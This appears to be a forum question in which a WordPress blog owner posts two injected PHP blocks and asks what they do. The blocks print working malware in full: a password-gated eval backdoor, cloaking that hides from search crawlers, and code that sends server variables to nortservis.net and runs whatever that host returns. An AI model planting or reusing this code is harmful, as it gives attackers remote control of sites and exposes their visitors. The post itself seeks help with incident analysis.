Google Safe Browsing recently detected malware on our Wordpress blog. Later we found out someone successfully injected some of our php files with blocks of code. I am trying to understand the code.Is it malicious? What does it do? or what did it do to our users?
Suspected Attack On Our Blog: internet security alert code: 055BCCAC9FEC
Can the two blocks of code below be used in an attack like this?
First:
if (md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
eval(base64_decode($_POST["cookies_p"]));
}
if(strpos($_SERVER[REQUEST_URI], "post_render") !== false)
{
$patchedfv = "GHKASMVG";
}
if (isset($_REQUEST[fdgdfgvv]))
{
if (md5($_REQUEST[fdgdfgvv]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
$patchedfv = "SDFDFSDF";
}
}
if($patchedfv === "GHKASMVG")
{
@ob_end_clean();
die;
}
error_reporting(0);
if (!$kjdke_c)
{
global $kjdke_c;
$kjdke_c = 1;
global $include_test;
$include_test = 1;
$bkljg = $_SERVER["HTTP_USER_AGENT"];
$ghfju = array(
"Google",
"Slurp",
"MSNBot",
"ia_archiver",
"Yandex",
"Rambler",
"bot",
"spid",
"Lynx",
"PHP",
"WordPress" . "integromedb",
"SISTRIX",
"Aggregator",
"findlinks",
"Xenu",
"BacklinkCrawler",
"Scheduler",
"mod_pagespeed",
"Index",
"ahoo",
"Tapatalk",
"PubSub",
"RSS",
"WordPress"
);
if (!($_GET[df] === "2") and !($_POST[dl] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE[condtions]) or (!$bkljg) or ($_SERVER[HTTP_REFERER] === "http://" . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) or ($_SERVER[REMOTE_ADDR] === "127.0.0.1") or ($_SERVER[REMOTE_ADDR] === $_SERVER[SERVER_ADDR]) or ($_GET[df] === "1") or ($_POST[dl] === "1")))
{
}
else
{
foreach($_SERVER as $ndbv => $cbcd)
{
$data_nfdh.= "&REM_" . $ndbv . "=\'" . base64_encode($cbcd) . "\'";
}
$context_jhkb = stream_context_create(array(
http => array(
timeout => 15,
header => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\\r\\nConnection: Close\\r\\n\\r\\n",
method => POST,
content => "REM_REM=\'1\'" . $data_nfdh
)
));
$vkfu = file_get_contents("http://nortservis.net/session.php?id", false, $context_jhkb);
if ($vkfu)
{
@eval($vkfu);
}
else
{
ob_start();
if (!@headers_sent())
{
@setcookie("condtions", "2", time() + 172800);
}
else
{
echo "<script>document.cookie=\'condtions=2; path=/; expires=" . date(D, d - M - YH:i:s, time() + 172800) . " GMT;\';</script>";
};
};
}
}
Second:
if (md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
eval(base64_decode($_POST["cookies_p"]));
}
if (strpos($_SERVER[REQUEST_URI], "post_render") !== false)
{
$patchedfv = "GHKASMVG";
}
if (isset($_REQUEST[fdgdfgvv]))
{
if (md5($_REQUEST[fdgdfgvv]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
$patchedfv = "SDFDFSDF";
}
}
if ($patchedfv === "GHKASMVG")
{
@ob_end_clean();
die;
}
if (strpos($_SERVER["HTTP_USER_AGENT"], "Win") === false)
{
$kjdke_c = 1;
}
error_reporting(0);
if (!$kjdke_c)
{
global $kjdke_c;
$kjdke_c = 1;
global $include_test;
$include_test = 1;
$bkljg = $_SERVER["HTTP_USER_AGENT"];
$ghfju = array(
"Google",
"Slurp",
"MSNBot",
"ia_archiver",
"Yandex",
"Rambler",
"bot",
"spid",
"Lynx",
"PHP",
"WordPress" . "integromedb",
"SISTRIX",
"Aggregator",
"findlinks",
"Xenu",
"BacklinkCrawler",
"Scheduler",
"mod_pagespeed",
"Index",
"ahoo",
"Tapatalk",
"PubSub",
"RSS",
"WordPress"
);
if (!($_GET[df] === "2") and !($_POST[dl] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE[condtions]) or (!$bkljg) or ($_SERVER[HTTP_REFERER] === "http://" . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) or ($_SERVER[REMOTE_ADDR] === "127.0.0.1") or ($_SERVER[REMOTE_ADDR] === $_SERVER[SERVER_ADDR]) or ($_GET[df] === "1") or ($_POST[dl] === "1")))
{
}
else
{
foreach($_SERVER as $ndbv => $cbcd)
{
$data_nfdh.= "&REM_" . $ndbv . "=\'" . base64_encode($cbcd) . "\'";
}
$context_jhkb = stream_context_create(array(
http => array(
timeout => 15,
header => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\\r\\nConnection: Close\\r\\n\\r\\n",
method => POST,
content => "REM_REM=\'1\'" . $data_nfdh
)
));
$vkfu = file_get_contents("http://nortservis.net/session.php?id", false, $context_jhkb);
if ($vkfu)
{
@eval($vkfu);
}
else
{
ob_start();
if (!@headers_sent())
{
@setcookie("condtions", "2", time() + 172800);
}
else
{
echo "<script>document.cookie=\'condtions=2; path=/; expires=" . date(D, d - M - YH:i:s, time() + 172800) . " GMT;\';</script>";
};
};
}
}
Conclusions: Thanks to @Alex Howansky it is certain that it's a malware at this point.And could have been used to perform any kind of attack(eg: the one above or random redirects to shady sites).
One More thing: Google detected this malware on our wordpress blog. Hosted at /blog. But google and other search engines are flagging the whole domain as a malware as a result users can't access our react app hosted at root domain. Is the whole domain compromised ? is our react app safe?
Aucun commentaire:
Enregistrer un commentaire